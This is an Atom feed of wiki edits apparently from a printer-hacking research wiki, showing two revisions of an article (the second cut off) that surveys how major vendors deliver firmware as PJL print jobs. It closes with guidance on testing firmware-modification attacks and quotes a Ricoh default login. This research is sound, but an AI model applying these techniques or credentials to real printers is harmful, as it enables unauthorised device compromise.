<?xml version="1.0"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="en">
		<id>http://hacking-printers.net/wiki/api.php?action=feedcontributions&amp;feedformat=atom&amp;user=84.153.135.37</id>
		<title>Hacking Printers - User contributions [en]</title>
		<link rel="self" type="application/atom+xml" href="http://hacking-printers.net/wiki/api.php?action=feedcontributions&amp;feedformat=atom&amp;user=84.153.135.37"/>
		<link rel="alternate" type="text/html" href="http://hacking-printers.net/wiki/index.php?title=Special:Contributions/84.153.135.37"/>
		<updated>2026-06-22T12:26:35Z</updated>
		<subtitle>User contributions</subtitle>
		<generator>MediaWiki 1.26.4</generator>

	<entry>
		<id>http://hacking-printers.net/wiki/index.php?title=Firmware_updates&amp;diff=321</id>
		<title>Firmware updates</title>
		<link rel="alternate" type="text/html" href="http://hacking-printers.net/wiki/index.php?title=Firmware_updates&amp;diff=321"/>
				<updated>2017-01-31T09:04:53Z</updated>
		
		<summary type="html">&lt;p&gt;84.153.135.37: /* Results */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;The dangers of malicious firmware updates are well-known and have been discussed early by &amp;lt;ref&amp;gt;''[https://www.cs.cornell.edu/~kozen/papers/acsac.pdf Malicious Code Detection for Open Firmware]'', F. Adelstein, M. Stillerman and D. Kozen, Computer Security Applications Conference, 2002. Proceedings. 18th Annual, IEEE, 2002, p. 403-412&amp;lt;/ref&amp;gt; and &amp;lt;ref&amp;gt;''[http://ceur-ws.org/Vol-190/paper11.pdf Phishing with Consumer Electronics: Malicious Home Routers]'', A. Tsow, MTW 190, 2006&amp;lt;/ref&amp;gt;. In contrast to other networked devices however, '''it is common for printers to deploy firmware updates as ordinary print jobs'''. This opens up a wide gateway for attackers because access to printing functionality is usually a low hurdle. One can only speculate about the motivation for such insecure design decisions but it seems logical that historic reasons play a role: Printers used to be connected by parallel or USB cable. Without network connectivity, security was less important and without a password-protected web server or similar functionality the printing channel was the only way to send data to the device.&lt;br /&gt;
&lt;br /&gt;
Firmware modification attacks against network printers have been demonstrated by &amp;lt;ref name=&amp;quot;cui2011print&amp;quot;&amp;gt;''[http://ids.cs.columbia.edu/sites/default/files/CuiPrintMeIfYouDare.pdf Print Me If You Dare: Firmware Modification Attacks and the Rise of Printer Malware]'', A. Cui and J. Stolfo, 2011&amp;lt;/ref&amp;gt; for HP devices, by &amp;lt;ref name=&amp;quot;jordon2014wrestling&amp;quot;&amp;gt;''[https://www.contextis.com/resources/blog/hacking-canon-pixma-printers-doomed-encryption/ Hacking Canon Pixma Printers – Doomed Encryption]'', M. Jordon, 2014&amp;lt;/ref&amp;gt; for the Canon PIXMA series and by &amp;lt;ref name=&amp;quot;heiland2011patched&amp;quot;&amp;gt;''[http://foofus.net/goons/percx/Xerox_hack.pdf From Patched to Pwned: Attacking Xerox's Multifunction Printers Patch Process]'', D. Heiland, 2011&amp;lt;/ref&amp;gt; and &amp;lt;ref name=&amp;quot;weidenbach2016pwn&amp;quot;&amp;gt;''[https://www.fkie.fraunhofer.de/content/dam/fkie/de/documents/xerox_phaser_6700_white_paper.pdf PWN Xerox Printers (… again): About Hardware Attacks and (In) Secure Cloning]'', P. Weidenbach and R. Ernst, Fraunhofer FKIE, 2016&amp;lt;/ref&amp;gt; for various Xerox models. As a countermeasure, printer manufacturers started to digitally sign their firmware &amp;lt;ref name=&amp;quot;hp2012rfu&amp;quot;&amp;gt;''[http://h20564.www2.hp.com/hpsc/doc/public/display?docId=emr_na-c03102449 Security Bulletin HPSBPI02728 SSRT100692 Rev. 6]'', HP Inc., 2012&amp;lt;/ref&amp;gt;.&lt;br /&gt;
&lt;br /&gt;
== Vendors ==&lt;br /&gt;
&lt;br /&gt;
To give an overview of firmware deployment procedures 1,400 firmware files for the top 10 printer manufacturers have been downloaded and systematically categorized by &amp;lt;ref&amp;gt;''Exploiting Network Printers'', J. Müller, 2016, p. 56-58&amp;lt;/ref&amp;gt;. The results are as follows.&lt;br /&gt;
&lt;br /&gt;
=== HP ===&lt;br /&gt;
&lt;br /&gt;
Firmware can be downloaded from [http://support.hp.com support.hp.com] or directly from [ftp://ftp.hp.com/pub/networking/software/pfirmware/ ftp.hp.com] via FTP. 419 files in HP's traditional remote firmware update (&amp;lt;code&amp;gt;.rfu&amp;lt;/code&amp;gt;) format and 206 newer ‘HP FutureSmart’ binaries (&amp;lt;code&amp;gt;.bdl&amp;lt;/code&amp;gt;) can be retrieved. The &amp;lt;code&amp;gt;.rfu&amp;lt;/code&amp;gt; files contain proprietary PJL commands like &amp;lt;code&amp;gt;@PJL UPGRADE SIZE=…&amp;lt;/code&amp;gt;, indicating that firmware updates are deployed as normal print jobs. This has been demonstrated by &amp;lt;ref name=&amp;quot;cui2011print&amp;quot;/&amp;gt; and caused HP to digitally sign all their printer firmware since March 2012 &amp;lt;ref name=&amp;quot;hp2012rfu&amp;quot;/&amp;gt;.&lt;br /&gt;
&lt;br /&gt;
=== Canon ===&lt;br /&gt;
&lt;br /&gt;
Firmware is available at [http://www.canon.com/support/ www.canon.com/support]. Canon however requires a valid device serial number to download any firmware. According to &amp;lt;ref name=&amp;quot;jordon2014wrestling&amp;quot;/&amp;gt;, who were able to modify firmware for the Canon PIXMA series, ‘there is no signing (the correct way to do it) but it does have very weak encryption’. According to email correspondence with a Canon technical support representative, ‘firmware does have to be digitally signed by Canon in order for it to be accepted by the printer’.&lt;br /&gt;
&lt;br /&gt;
=== Epson ===&lt;br /&gt;
&lt;br /&gt;
Firmware can be downloaded from [http://epson.com epson.com] and via FTP from [ftp://download.epson-europe.com/ download.epson-europe.com]. Files come as WinZip self-extracting &amp;lt;code&amp;gt;.exe&amp;lt;/code&amp;gt; files and can be unpacked using ''unp''&amp;lt;ref&amp;gt;''[http://unp.bencastricum.nl/ UNP executable file restore utility]'', A. Karwath&amp;lt;/ref&amp;gt;. The contained &amp;lt;code&amp;gt;.efu&amp;lt;/code&amp;gt; files can be analyzed using ''Binwalk''&amp;lt;ref&amp;gt;''[http://binwalk.org/ Binwalk firmware analysis tool]'', C. Heffner&amp;lt;/ref&amp;gt; which extracts the actual firmware. One can obtain 49 &amp;lt;code&amp;gt;.rcx&amp;lt;/code&amp;gt; files of unknown format (‘SEIKO EPSON EpsonNet Form’) and nine &amp;lt;code&amp;gt;.prn&amp;lt;/code&amp;gt; files containing PJL commands (&amp;lt;code&amp;gt;@PJL ENTER LANGUAGE=DOWNLOAD&amp;lt;/code&amp;gt;). Epson has not released any publicly available information on protection mechanisms.&lt;br /&gt;
&lt;br /&gt;
=== Dell ===&lt;br /&gt;
&lt;br /&gt;
Firmware can be obtained from [http://downloads.dell.com downloads.dell.com] and from [ftp://ftp.us.dell.com/printer ftp.us.dell.com/printer]. Files can be unpacked using ''unp'' and the included &amp;lt;code&amp;gt;.zip&amp;lt;/code&amp;gt; files can be extracted with a variant of ''unzip''. Dell does not produce any printing devices, but rebadges the products of other vendors. Therefore a wide variety of firmware files, including 18 &amp;lt;code&amp;gt;.hd&amp;lt;/code&amp;gt; files containing &amp;lt;code&amp;gt;@PJL FIRMWARE=…&amp;lt;/code&amp;gt;, 25 &amp;lt;code&amp;gt;.prn&amp;lt;/code&amp;gt; files containing &amp;lt;code&amp;gt;@PJL ENTER LANGUAGE=DOWNLOAD&amp;lt;/code&amp;gt; and 30 &amp;lt;code&amp;gt;.fls&amp;lt;/code&amp;gt;/&amp;lt;code&amp;gt;.fly&amp;lt;/code&amp;gt; files containing &amp;lt;code&amp;gt;@PJL LPROGRAMRIP&amp;lt;/code&amp;gt; were found. Regarding protection mechanisms, Dell has not released any publicly available information.&lt;br /&gt;
&lt;br /&gt;
=== Brother ===&lt;br /&gt;
&lt;br /&gt;
Firmware cannot be easily downloaded. Instead a Windows binary needs to be run which checks for available printers and requests download links for the latest firmware from a web service. By guessing correct parameters one is able to get the links for 98 files. Firmware files do not need to be unpacked as they already come in raw format. 79 files have the extension &amp;lt;code&amp;gt;.djf&amp;lt;/code&amp;gt; and contain &amp;lt;code&amp;gt;@PJL EXECUTE BRDOWNLOAD&amp;lt;/code&amp;gt;, while 9 &amp;lt;code&amp;gt;.blf&amp;lt;/code&amp;gt; files contain &amp;lt;code&amp;gt;@PJL ENTER LANGUAGE=PCL&amp;lt;/code&amp;gt;. Brother has not released any publicly available information on protection mechanisms.&lt;br /&gt;
&lt;br /&gt;
=== Lexmark ===&lt;br /&gt;
&lt;br /&gt;
Firmware is available from [http://support.lexmark.com support.lexmark.com] and can be unpacked using ''unp''. 63 &amp;lt;code&amp;gt;.fls&amp;lt;/code&amp;gt; files could be obtained containing the PJL header &amp;lt;code&amp;gt;@PJL LPROGRAMRIP&amp;lt;/code&amp;gt; to install the firmware. Lexmark's security whitepaper claims ‘packages must be encrypted with a symmetric encryption algorithm through a key that is known only to Lexmark and is embedded securely in all devices. However, the strongest security measure comes from requiring that all firmware packages must include multiple digital 2048-bit RSA signatures from Lexmark. If these signatures are not valid [...] the firmware is discarded’ &amp;lt;ref&amp;gt;''[http://media.lexmark.com/www/doc/en_US/Security_White_Paper_Final_Q12014.pdf Security Features of Lexmark Multi-Function and Single Function Printers]'', Lexmark International, 2013, p. 6&amp;lt;/ref&amp;gt;.&lt;br /&gt;
&lt;br /&gt;
=== Samsung ===&lt;br /&gt;
&lt;br /&gt;
Firmware can be downloaded from [http://www.samsung.com/us/support/download www.samsung.com/us/support/download]. Retrieved files either come as zip archives or Windows executables which can be run in wine and further unpacked using ''unp''. This way, 33 &amp;lt;code&amp;gt;.hd&amp;lt;/code&amp;gt; files starting with &amp;lt;code&amp;gt;@PJL FIRMWARE&amp;lt;/code&amp;gt; and associated &amp;lt;code&amp;gt;.prn&amp;lt;/code&amp;gt; files containing &amp;lt;code&amp;gt;@PJL DEFAULT SWUPGRADE=ON&amp;lt;/code&amp;gt; could be obtained. Samsung has not released any publicly available information on protection mechanisms.&lt;br /&gt;
&lt;br /&gt;
=== Xerox ===&lt;br /&gt;
&lt;br /&gt;
Firmware is publicly available at [http://www.support.xerox.com www.support.xerox.com]. Downloaded files come in zip format and can be unpacked using ''unzip''. Firmware files are in different formats: 16 &amp;lt;code&amp;gt;.hd&amp;lt;/code&amp;gt; files including &amp;lt;code&amp;gt;@PJL FIRMWARE=…&amp;lt;/code&amp;gt;, 36 PostScript files for older devices and 35 &amp;lt;code&amp;gt;.dlm&amp;lt;/code&amp;gt; files, which is the format currently used by Xerox and includes digital signatures. A flaw in the deployment process however was found by &amp;lt;ref name=&amp;quot;heiland2011patched&amp;quot;/&amp;gt; and extended by &amp;lt;ref name=&amp;quot;weidenbach2016pwn&amp;quot;/&amp;gt;, leading to remote code execution – the private key and the tool used for code signing were contained in the firmware itself.&lt;br /&gt;
&lt;br /&gt;
=== Ricoh ===&lt;br /&gt;
&lt;br /&gt;
The ‘Firmware Download Center’ at [https://support.ricoh.com support.ricoh.com] is not open to the general public. Fortunately the interweb contains direct links to a couple of driver/firmware download pages so one is able to obtain 31 firmware files using a simple Google search (&amp;lt;code&amp;gt;site:support.ricoh.com firmware&amp;lt;/code&amp;gt;). Files can be unpacked using ''unp''. 14 &amp;lt;code&amp;gt;.bin&amp;lt;/code&amp;gt; files contain &amp;lt;code&amp;gt;@PJL RSYSTEMUPDATE SIZE=…&amp;lt;/code&amp;gt; while 15 &amp;lt;code&amp;gt;.brn&amp;lt;/code&amp;gt; files are associated with a &amp;lt;code&amp;gt;settings.ini&amp;lt;/code&amp;gt;, including &amp;lt;code&amp;gt;@PJL FWDOWNLOAD&amp;lt;/code&amp;gt; and &amp;lt;code&amp;gt;USERID=sysadm, PASSWORD=sysadm&amp;lt;/code&amp;gt;. Ricoh does not provide any up-to-date information on protection mechanisms. In a whitepaper dating back to 2007, Ricoh claims that ‘only service technicians have a password and dedicated account for making firmware updates’ &amp;lt;ref&amp;gt;''[http://www.tsrc.ricoh-usa.com/pwhp/Network_Security_v1.7.pdf Network Security White Paper for Digital Multifunction and Printing Devices]'', Ricoh Corp., 2007, p. 10&amp;lt;/ref&amp;gt;.&lt;br /&gt;
&lt;br /&gt;
=== Kyocera ===&lt;br /&gt;
&lt;br /&gt;
Kyocera does not release firmware to end-users. In a publicly available Kyocera dealer forum however, firmware downloads for various models are linked: [ftp://ftp.kdaconnect.com ftp.kdaconnect.com]. Files can be unpacked using ''unp'' and contain mountable ''cramfs''&amp;lt;ref&amp;gt;''[http://sourceforge.net/projects/cramfs/ cramfs – A Linux filesystem designed to be simple, small, and to compress things well]'', D. Quinlan&amp;lt;/ref&amp;gt; and ''squashfs''&amp;lt;ref&amp;gt;''[http://squashfs.sourceforge.net/ squashfs – A compressed read-only filesystem for Linux]'', P. Lougher and R. Lougher&amp;lt;/ref&amp;gt; images as well as proprietary binary formats. Firmware is deployed as a print job with &amp;lt;code&amp;gt;!R! UPGR'SYS';EXIT;&amp;lt;/code&amp;gt; prepended – the ''upgrade'' command of the ''PRESCRIBE'' page description language &amp;lt;ref&amp;gt;''[http://kyoceradocumentsolutions.co.th/news/products/img_document/fs19k_rev11.pdf Kyocera Laser Printer FS-1900 Service Manual]'', Kyocera Corp., 2001, ch. 3-19&amp;lt;/ref&amp;gt;. Kyocera has not released any publicly available information on protection mechanisms.&lt;br /&gt;
&lt;br /&gt;
=== Konica ===&lt;br /&gt;
&lt;br /&gt;
Although not actively promoted, firmware for Konica Minolta printers can be downloaded from [http://download6.konicaminolta.eu download6.konicaminolta.eu]. Newer Internet-connected devices have the capability to perform firmware updates themselves. Compressed files come in different formats and can be unpacked using ''unp'', ''unzip'' and ''tar'' which results in 38 proprietary &amp;lt;code&amp;gt;.bin&amp;lt;/code&amp;gt; files, 20 PostScript based ‘softload printer modules’ for older devices and 14 files of different extensions containing PJL commands like &amp;lt;code&amp;gt;@PJL ENTER LANGUAGE=FIRMUPDATE&amp;lt;/code&amp;gt;. The Konica Minolta security whitepaper claims that firmware is verified using a ‘hash value’ &amp;lt;ref&amp;gt;''[http://www.biz.konicaminolta.com/product_security_policy/pdf/security_white_paper_version8_0_7.pdf Konica Minolta Security White Paper]'', Konica Minolta, Inc., 2015, p. 26&amp;lt;/ref&amp;gt;. It may be doubted that such a scheme is cryptographically secure.&lt;br /&gt;
&lt;br /&gt;
== Results ==&lt;br /&gt;
&lt;br /&gt;
Out of ten analyzed manufacturers, nine use [[PJL]] commands for all or at least some of their firmware update procedures which is a strong indicator that updates are deployed as ordinary print jobs. The remaining manufacturer – Kyocera – applies the ''PRESCRIBE'' page description language. One can therefore claim that it is common in the printing industry to install new firmware over the printing channel itself and name a '''major design flaw''' present in almost any printer device: '''data and code over the same channel'''. Exploitation of this issue however is hard as for most manufacturers no reasoned statement on protection mechanisms can be made. An in-depth analysis of firmware modification attacks should therefore be part of future research. A summary of file headers or types for all obtained firmware files is given below:&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
|-&lt;br /&gt;
! Vendor !! Extension !! Quantity !! File header or type&lt;br /&gt;
|-&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; | HP&lt;br /&gt;
| rfu            || 419  || @PJL UPGRADE SIZE=…&lt;br /&gt;
|-&lt;br /&gt;
| bdl            || 206  || FutureSmart binary format&lt;br /&gt;
|-&lt;br /&gt;
| rowspan=&amp;quot;3&amp;quot; | Epson&lt;br /&gt;
| rcx            ||  49  || SEIKO EPSON EpsonNet Form&lt;br /&gt;
|-&lt;br /&gt;
| prn            ||   9  || &amp;lt;span style=&amp;quot;background:#98FB98&amp;quot;&amp;gt;@PJL ENTER LANGUAGE=DOWNLOAD&amp;lt;/span&amp;gt;&lt;br /&gt;
|-&lt;br /&gt;
| brn            ||   7  || &amp;lt;span style=&amp;quot;background:#F0E68C&amp;quot;&amp;gt;Unknown binary, includes config file&amp;lt;/span&amp;gt;&lt;br /&gt;
|-&lt;br /&gt;
| rowspan=&amp;quot;6&amp;quot; | Dell&lt;br /&gt;
| fls, fly       ||  30  || &amp;lt;span style=&amp;quot;background:#87CEEB&amp;quot;&amp;gt;@PJL LPROGRAMRIP&amp;lt;/span&amp;gt;&lt;br /&gt;
|-&lt;br /&gt;
| prn            ||  25  || &amp;lt;span style=&amp;quot;background:#98FB98&amp;quot;&amp;gt;@PJL ENTER LANGUAGE=DOWNLOAD&amp;lt;/span&amp;gt;&lt;br /&gt;
|-&lt;br /&gt;
| hd             ||  18  || &amp;lt;span style=&amp;quot;background:#F4A460&amp;quot;&amp;gt;@PJL FIRMWARE=…&amp;lt;/span&amp;gt;&lt;br /&gt;
|-&lt;br /&gt;
| brn            ||   3  || &amp;lt;span style=&amp;quot;background:#F0E68C&amp;quot;&amp;gt;Unknown binary, includes config file&amp;lt;/span&amp;gt;&lt;br /&gt;
|-&lt;br /&gt;
| ps             ||   2  || PostScript (title: ''Firmware Update'')&lt;br /&gt;
|-&lt;br /&gt;
| pjl            ||   1  || @PJL ENTER LANGUAGE=FLASH&lt;br /&gt;
|-&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; | Brother&lt;br /&gt;
| djf            ||  79  || @PJL EXECUTE BRDOWNLOAD&lt;br /&gt;
|-&lt;br /&gt;
| blf            ||   9  || @PJL ENTER LANGUAGE=PCL&lt;br /&gt;
|-&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; | Lexmark&lt;br /&gt;
| fls            ||  63  || &amp;lt;span style=&amp;quot;background:#87CEEB&amp;quot;&amp;gt;@PJL LPROGRAMRIP&amp;lt;/span&amp;gt;&lt;br /&gt;
|-&lt;br /&gt;
| bin, fls       ||   6  || Unknown binary format&lt;br /&gt;
|-&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; | Samsung&lt;br /&gt;
| hd             ||  33  || &amp;lt;span style=&amp;quot;background:#F4A460&amp;quot;&amp;gt;@PJL FIRMWARE=…&amp;lt;/span&amp;gt;&lt;br /&gt;
|-&lt;br /&gt;
| fls, hd0       ||   4  || &amp;lt;span style=&amp;quot;background:#DDA0DD&amp;quot;&amp;gt;@PJL DEFAULT P1284VALUE=…&amp;lt;/span&amp;gt;&lt;br /&gt;
|-&lt;br /&gt;
| rowspan=&amp;quot;10&amp;quot; | Xerox&lt;br /&gt;
| ps             ||  36  || PostScript (title: ''Firmware Update'')&lt;br /&gt;
|-&lt;br /&gt;
| dlm            ||  35  || Xerox Dynamic Loadable Module&lt;br /&gt;
|-&lt;br /&gt;
| prn, bin       ||  20  || &amp;lt;span style=&amp;quot;background:#98FB98&amp;quot;&amp;gt;@PJL ENTER LANGUAGE=DOWNLOAD&amp;lt;/span&amp;gt;&lt;br /&gt;
|-&lt;br /&gt;
| hd             ||  16  || &amp;lt;span style=&amp;quot;background:#F4A460&amp;quot;&amp;gt;@PJL FIRMWARE=…&amp;lt;/span&amp;gt;&lt;br /&gt;
|-&lt;br /&gt;
| brn            ||  10  || &amp;lt;span style=&amp;quot;background:#F0E68C&amp;quot;&amp;gt;Unknown binary, includes config file&amp;lt;/span&amp;gt;&lt;br /&gt;
|-&lt;br /&gt;
| bin            ||  10  || @PJL SET JOBATTR=&amp;quot;@SWDL&amp;quot;&lt;br /&gt;
|-&lt;br /&gt;
| fls, hd, hde   ||   8  || &amp;lt;span style=&amp;quot;background:#DDA0DD&amp;quot;&amp;gt;@PJL DEFAULT P1284VALUE=…&amp;lt;/span&amp;gt;&lt;br /&gt;
|-&lt;br /&gt;
| fls, xfc       ||   4  || @PJL ENTER LANGUAGE=XFLASH&lt;br /&gt;
|-&lt;br /&gt;
| pjl            ||   3  || @PJL FSDOWNLOAD [name].rpm&lt;br /&gt;
|-&lt;br /&gt;
| axf            ||   3  || RISC OS AIF executable&lt;br /&gt;
|-&lt;br /&gt;
| rowspan=&amp;quot;3&amp;quot; | Ricoh&lt;br /&gt;
| brn            ||  15  || @PJL FWDOWNLOAD…&lt;br /&gt;
|-&lt;br /&gt;
| bin            ||  14  || @PJL RSYSTEMUPDATE SIZE=…&lt;br /&gt;
|-&lt;br /&gt;
| fls            ||   4  || &amp;lt;span style=&amp;quot;background:#87CEEB&amp;quot;&amp;gt;@PJL LPROGRAMRIP&amp;lt;/span&amp;gt;&lt;br /&gt;
|-&lt;br /&gt;
| rowspan=&amp;quot;4&amp;quot; | Kyocera&lt;br /&gt;
| cramfs, img    ||  98  || cramfs image&lt;br /&gt;
|-&lt;br /&gt;
| bin, squashfs  ||  79  || squashfs image&lt;br /&gt;
|-&lt;br /&gt;
| bin, kmmfp     ||  41  || u-boot legacy uImage&lt;br /&gt;
|-&lt;br /&gt;
| efi, kmpanel   ||  13  || proprietary image format&lt;br /&gt;
|-&lt;br /&gt;
| rowspan=&amp;quot;4&amp;quot; | Konica Minolta&lt;br /&gt;
| bin            ||  38  || unknown binary, additional checksum file&lt;br /&gt;
|-&lt;br /&gt;
| ps             ||  20  || PostScript (title: ''Softload printer modules'')&lt;br /&gt;
|-&lt;br /&gt;
| ftp, prn       ||  11  || @PJL ENTER LANGUAGE=FIRMUPDATE&lt;br /&gt;
|-&lt;br /&gt;
| upg            ||   1  || @PJL ENTER LANGUAGE=UPGRADE&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
'''How to test for this attack?'''&lt;br /&gt;
&lt;br /&gt;
The security of code signing is based on keeping the private key a long-term trade secret. There are however still printers in the wild which are potentially vulnerable to malicious firmware – either because they have not yet been updated or because proprietary checksum algorithms are sold as cryptographically secure digital signature schemes. It certainly must be pointed out that analyzing firmware can be hard if vendors do not document their firmware formats and update routines. Usually this requires some reverse engineering. Testing the feasibility of firmware modification attacks therefore is not trivial. In a simple test, one can '''flip a single bit''' and check if the modified firmware is still accepted by the printer device. If not, either a checksum or a digital signature is verified by the printer. Finding the difference is not always easy and writing malicious firmware (with a correct checksum) can be a time-consuming project.&lt;br /&gt;
&lt;br /&gt;
''Other attack scenarios include:''&lt;br /&gt;
&lt;br /&gt;
* Even if the firmware is signed, one may be able to downgrade to a certain (signed) firmware version which has known security weaknesses.&lt;br /&gt;
* Even if the firmware is signed, it can sometimes be mounted to gain further information (especially Konica Minolta firmware is easily mountable).&lt;br /&gt;
* Just because firmware is signed doesn't mean it's secure. Using ''binwalk''/''grep'' etc. one may find components with known vulnerabilities like [https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-7547 CVE-2015-7547].&lt;br /&gt;
&lt;br /&gt;
'''Who can perform this attack?'''&lt;br /&gt;
&lt;br /&gt;
Anyone who can print, for example through [[USB drive or cable]], [[Port 9100 printing]] or [[Cross-site printing]].&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
----&lt;/div&gt;</summary>
		<author><name>84.153.135.37</name></author>	</entry>

	<entry>
		<id>http://hacking-printers.net/wiki/index.php?title=Firmware_updates&amp;diff=320</id>
		<title>Firmware updates</title>
		<link rel="alternate" type="text/html" href="http://hacking-printers.net/wiki/index.php?title=Firmware_updates&amp;diff=320"/>
				<updated>2017-01-31T08:58:10Z</updated>
		
		<summary type="html">&lt;p&gt;84.153.135.37: /* Brother */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;The dangers of malicious firmware updates are well-known and have been discussed early by &amp;lt;ref&amp;gt;''[https://www.cs.cornell.edu/~kozen/papers/acsac.pdf Malicious Code Detection for Open Firmware]'', F. Adelstein, M. Stillerman and D. Kozen, Computer Security Applications Conference, 2002. Proceedings. 18th Annual, IEEE, 2002, p. 403-412&amp;lt;/ref&amp;gt; and &amp;lt;ref&amp;gt;''[http://ceur-ws.org/Vol-190/paper11.pdf Phishing with Consumer Electronics: Malicious Home Routers]'', A. Tsow, MTW 190, 2006&amp;lt;/ref&amp;gt;. In contrast to other networked devices however, '''it is common for printers to deploy firmware updates as ordinary print jobs'''. This opens up a wide gateway for attackers because access to printing functionality is usually a low hurdle. One can only speculate about the motivation for such insecure design decisions but it seems logical that historic reasons play a role: Printers used to be connected by parallel or USB cable. Without network connectivity, security was less important and without a password-protected web server or similar functionality the printing channel was the only way to send data to the device.&lt;br /&gt;
&lt;br /&gt;
Firmware modification attacks against network printers have been demonstrated by &amp;lt;ref name=&amp;quot;cui2011print&amp;quot;&amp;gt;''[http://ids.cs.columbia.edu/sites/default/files/CuiPrintMeIfYouDare.pdf Print Me If You Dare: Firmware Modification Attacks and the Rise of Printer Malware]'', A. Cui and J. Stolfo, 2011&amp;lt;/ref&amp;gt; for HP devices, by &amp;lt;ref name=&amp;quot;jordon2014wrestling&amp;quot;&amp;gt;''[https://www.contextis.com/resources/blog/hacking-canon-pixma-printers-doomed-encryption/ Hacking Canon Pixma Printers – Doomed Encryption]'', M. Jordon, 2014&amp;lt;/ref&amp;gt; for the Canon PIXMA series and by &amp;lt;ref name=&amp;quot;heiland2011patched&amp;quot;&amp;gt;''[http://foofus.net/goons/percx/Xerox_hack.pdf From Patched to Pwned: Attacking Xerox's Multifunction Printers Patch Process]'', D. Heiland, 2011&amp;lt;/ref&amp;gt; and &amp;lt;ref name=&amp;quot;weidenbach2016pwn&amp;quot;&amp;gt;''[https://www.fkie.fraunhofer.de/content/dam/fkie/de/documents/xerox_phaser_6700_white_paper.pdf PWN Xerox Printers (… again): About Hardware Attacks and (In) Secure Cloning]'', P. Weidenbach and R. Ernst, Fraunhofer FKIE, 2016&amp;lt;/ref&amp;gt; for various Xerox models. As a countermeasure, printer manufacturers started to digitally sign their firmware &amp;lt;ref name=&amp;quot;hp2012rfu&amp;quot;&amp;gt;''[http://h20564.www2.hp.com/hpsc/doc/public/display?docId=emr_na-c03102449 Security Bulletin HPSBPI02728 SSRT100692 Rev. 6]'', HP Inc., 2012&amp;lt;/ref&amp;gt;.&lt;br /&gt;
&lt;br /&gt;
== Vendors ==&lt;br /&gt;
&lt;br /&gt;
To give an overview of firmware deployment procedures 1,400 firmware files for the top 10 printer manufacturers have been downloaded and systematically categorized by &amp;lt;ref&amp;gt;''Exploiting Network Printers'', J. Müller, 2016, p. 56-58&amp;lt;/ref&amp;gt;. The results are as follows.&lt;br /&gt;
&lt;br /&gt;
=== HP ===&lt;br /&gt;
&lt;br /&gt;
Firmware can be downloaded from [http://support.hp.com support.hp.com] or directly from [ftp://ftp.hp.com/pub/networking/software/pfirmware/ ftp.hp.com] via FTP. 419 files in HP's traditional remote firmware update (&amp;lt;code&amp;gt;.rfu&amp;lt;/code&amp;gt;) format and 206 newer ‘HP FutureSmart’ binaries (&amp;lt;code&amp;gt;.bdl&amp;lt;/code&amp;gt;) can be retrieved. The &amp;lt;code&amp;gt;.rfu&amp;lt;/code&amp;gt; files contain proprietary PJL commands like &amp;lt;code&amp;gt;@PJL UPGRADE SIZE=…&amp;lt;/code&amp;gt;, indicating that firmware updates are deployed as normal print jobs. This has been demonstrated by &amp;lt;ref name=&amp;quot;cui2011print&amp;quot;/&amp;gt; and caused HP to digitally sign all their printer firmware since March 2012 &amp;lt;ref name=&amp;quot;hp2012rfu&amp;quot;/&amp;gt;.&lt;br /&gt;
&lt;br /&gt;
=== Canon ===&lt;br /&gt;
&lt;br /&gt;
Firmware is available at [http://www.canon.com/support/ www.canon.com/support]. Canon however requires a valid device serial number to download any firmware. According to &amp;lt;ref name=&amp;quot;jordon2014wrestling&amp;quot;/&amp;gt;, who were able to modify firmware for the Canon PIXMA series, ‘there is no signing (the correct way to do it) but it does have very weak encryption’. According to email correspondence with a Canon technical support representative, ‘firmware does have to be digitally signed by Canon in order for it to be accepted by the printer’.&lt;br /&gt;
&lt;br /&gt;
=== Epson ===&lt;br /&gt;
&lt;br /&gt;
Firmware can be downloaded from [http://epson.com epson.com] and via FTP from [ftp://download.epson-europe.com/ download.epson-europe.com]. Files come as WinZip self-extracting &amp;lt;code&amp;gt;.exe&amp;lt;/code&amp;gt; files and can be unpacked using ''unp''&amp;lt;ref&amp;gt;''[http://unp.bencastricum.nl/ UNP executable file restore utility]'', A. Karwath&amp;lt;/ref&amp;gt;. The contained &amp;lt;code&amp;gt;.efu&amp;lt;/code&amp;gt; files can be analyzed using ''Binwalk''&amp;lt;ref&amp;gt;''[http://binwalk.org/ Binwalk firmware analysis tool]'', C. Heffner&amp;lt;/ref&amp;gt; which extracts the actual firmware. One can obtain 49 &amp;lt;code&amp;gt;.rcx&amp;lt;/code&amp;gt; files of unknown format (‘SEIKO EPSON EpsonNet Form’) and nine &amp;lt;code&amp;gt;.prn&amp;lt;/code&amp;gt; files containing PJL commands (&amp;lt;code&amp;gt;@PJL ENTER LANGUAGE=DOWNLOAD&amp;lt;/code&amp;gt;). Epson has not released any publicly available information on protection mechanisms.&lt;br /&gt;
&lt;br /&gt;
=== Dell ===&lt;br /&gt;
&lt;br /&gt;
Firmware can be obtained from [http://downloads.dell.com downloads.dell.com] and from [ftp://ftp.us.dell.com/printer ftp.us.dell.com/printer]. Files can be unpacked using ''unp'' and the included &amp;lt;code&amp;gt;.zip&amp;lt;/code&amp;gt; files can be extracted with a variant of ''unzip''. Dell does not produce any printing devices, but rebadges the products of other vendors. Therefore a wide variety of firmware files, including 18 &amp;lt;code&amp;gt;.hd&amp;lt;/code&amp;gt; files containing &amp;lt;code&amp;gt;@PJL FIRMWARE=…&amp;lt;/code&amp;gt;, 25 &amp;lt;code&amp;gt;.prn&amp;lt;/code&amp;gt; files containing &amp;lt;code&amp;gt;@PJL ENTER LANGUAGE=DOWNLOAD&amp;lt;/code&amp;gt; and 30 &amp;lt;code&amp;gt;.fls&amp;lt;/code&amp;gt;/&amp;lt;code&amp;gt;.fly&amp;lt;/code&amp;gt; files containing &amp;lt;code&amp;gt;@PJL LPROGRAMRIP&amp;lt;/code&amp;gt; were found. Regarding protection mechanisms, Dell has not released any publicly available information.&lt;br /&gt;
&lt;br /&gt;
=== Brother ===&lt;br /&gt;
&lt;br /&gt;
